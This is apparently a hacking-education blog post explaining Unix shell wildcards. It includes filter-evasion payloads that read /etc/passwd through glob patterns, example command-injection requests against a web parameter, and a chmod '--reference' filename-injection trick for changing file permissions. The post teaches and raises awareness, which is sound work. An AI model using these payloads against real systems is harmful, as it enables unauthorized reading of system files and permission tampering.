Wildcards Understanding and Using for Hacking

banner wild pass

Wildcards, I would like to highlight the use of Wildcards, because they are incredibly important, especially for “hacking-related and some programming” stuff. In this article I will cover one interesting old-school Unix hacking technique, that will still work nowadays in 2020.

In real-world attacks, arbitrary shell options and or arguments could be hidden among regular files, and not so easily spotted by the administrator. Same in case of cron jobs, shell scripts or web applications that calls shell commands.

Since for many people this would be an Abracadabra article, I would try to keep it as simple as possible with the help of some examples. “Jip and Janneke” language. (The latter is a Dutch pronunciation), which means to explain it as simple as possible so that “almost” everyone understands it.


abracadabra

This article has been on the shelf for a while, actually for almost half a year, as you might see from the date on the pictures. The reason for this is because I find it quite difficult to write about this. I sincerely hope that this article is helpful.


How can I use the wildcards?

Use your imagination……


Have some wildcards fun

Do you know you’re have a secret weapon in your pocket, it’s called “wildcard“.

/???/??t /???/??ss??
With this command, I can read your password file 😀


joker

Some Shell Wildcards

? The question mark matches any single character.
* An asterisk matches any number of characters in a filename, including none.
[ ] Brackets enclose a set of characters, any one of which may match a single character at that position.
– A hyphen used within [ ] denotes a range of characters.
~ A tilde at the beginning of a word expands to the name of your home directory. If you append another user’s login name to the character, it refers to that user’s home directory.


Basic example of wildcards usage

List all files with the Python extension

ls *.py

Delete all Python files “rm = remove”

(Warning, if you are using this command, do it on a test machine, or make sure you know what you are doing).

rm *.py

List all files whose name is beginning with string ‘test’ and has exactly
one additional character

ls test?

If you look at these examples above, I don’t think I need to explain to you what options you can use with this as well. Use your imagination.


Information on wildcards

There are lots of bash syntaxes that makes you be able to execute system commands just using the forward-slash “/”, the question mark “?”, numbers, and letters. You can even enumerate files and get their content.

Wildcards: For information on wildcards is the follow command

man 7 glob

man 7 glob wildcards

Instead of executing the ls command, you can use the following:
/???/?s
/???/?s –help
/???/?s -all


/???/?s --help

The question mark wildcard represents only one character which can be any character. This in case you know a part of a filename but not one letter, then you could use this wildcard.

For example ls *.?? would list all files in the directory that have an extension of 2 characters in length.

So files with the extensions like .py would be listed.


Wildcards ls *.???

For example ls *.??? would list all files in the directory that have an extension of 3 characters in length.


ls *.???

Thus files having extensions such as .png , .pdf , .txt would be listed.


Wildcards /???/??t /???/p??s??

Read your password file

As you can see in the screenshot, there’re 3 errors “/bin/cat *: Is a directory”. This happens because /???/??t can be “translated” to /bin/cat but also /dev/net or /etc/apt , etc…


/???/??t /???/p??s??

Standard: /bin/cat /etc/passwd

Evasion: /???/??t /???/??ss??

Used chars: / ? t s

wild pass

Why do I use The “?”
Instead of “*
Because the asterisk (*) is widely used for comment syntax
(something like / * I’m a comment * /) and WAF blocks it in order to avoid SQL Injection.


Enumerate files and directories using echo

Install http

sudo apt install httpie

httpie Wildcards
In this image I am using Anarchy Linux

The echo command could enumerate files and directories on a file system using a wildcard. For example:

http http://website.com/?c=echo+/???/??ss??
http http://ip-address/?c=echo+/???/??ss??

linux kernel rce vulnerability (Remote Code-Execution)


2020 04 21 18 50


2020 04 21 23 04

Netstat Wildcard

Netstat uses a asterisk * as a wildcard which means “any”. An example would be

Example output:


....Local Address Foreign Address State
... *:smtp          *:*   LISTEN

Under “Local Address” *, in *:smtp, means the process is listening on all of the networks interfaces the machine has for the port mapped as SMTP (see /etc/services for service resolution). This can also be shown as 0.0.0.0. The first *, in *:*, means connections can come from any IP address, and the second *, in :, means the connection can originate from any port on the remote machine.

Netstat Wildcard

Chmod file reference trick

A interesting attack is ‘chmod’. Chmod also has –reference option that can be abused to specify arbitrary permissions on files selected with asterisk wildcard.

Chmod manual page (man chmod)


Chmod file reference trick

What is happened? Instead of 000, all files are now set to mode 777 because of the ‘–reference’ option supplied through file name.

Beside just –reference option, attacker can also create another file with ‘-R’ filename, to change file permissions on files in all subdirectories recursively.

In the future I would certainly supplement this article, because there is so much to say and write about this.


IMPORTANT THINGS TO REMEMBER

  • This article was written for educational purposes and pentest only.
  • The author can not be held responsible for damages caused by the use of these resources.
  • You will not misuse the information to gain unauthorized access.
  • The information shall only be used to expand knowledge and not for causing malicious or damaging attacks.
  • Just remember, Performing any hacks without written permission is illegal ..!

Read also the Disclaimer

All the techniques provided in the tutorials on the hackingpassion.com, YouTube channel, and on the website hackingpassion.com are meant for educational purposes only.

If you are using any of those techniques for illegal purposes, hackingpassion.com can’t be held responsible for possible lawful consequences.

My goal is to educate people and increase awareness by exposing methods used by real black-hat hackers and show how to secure systems from these hackers.


Finally

Since I have quite a lot of work on the articles and videos that I make, I also have quite high server costs, because people just find it necessary to attack a hacking website like this one. (For which I certainly do NOT give permission, and is therefore it is very illegal)

A donation is certainly welcome. (Via my other website, BullsEye0.com) So that I can continue with this work. It is a “Passion” of mine to do this and to teach people something new.

If you want to speak to me in person the best thing you can do is send me a email.
Before you do, read the email guide, that will save us both a lot of useless time.

If you have any questions about this article, any feedback, suggestions if you want to share your thoughts, please feel free to do it using the below comment form.


Bulls Eye
My name is Jolanda de Koff and on the internet, I'm also known as Bulls Eye. Ethical Hacker, Penetration tester, Researcher, Programmer, Self Learner, and forever n00b. Not necessarily in that order. Like to make my own hacking tools and I sometimes share them with you. "You can create art & beauty with a computer and Hacking is not a hobby but a way of life ..." I ♥ open-source and Linux"
error: Content is protected !!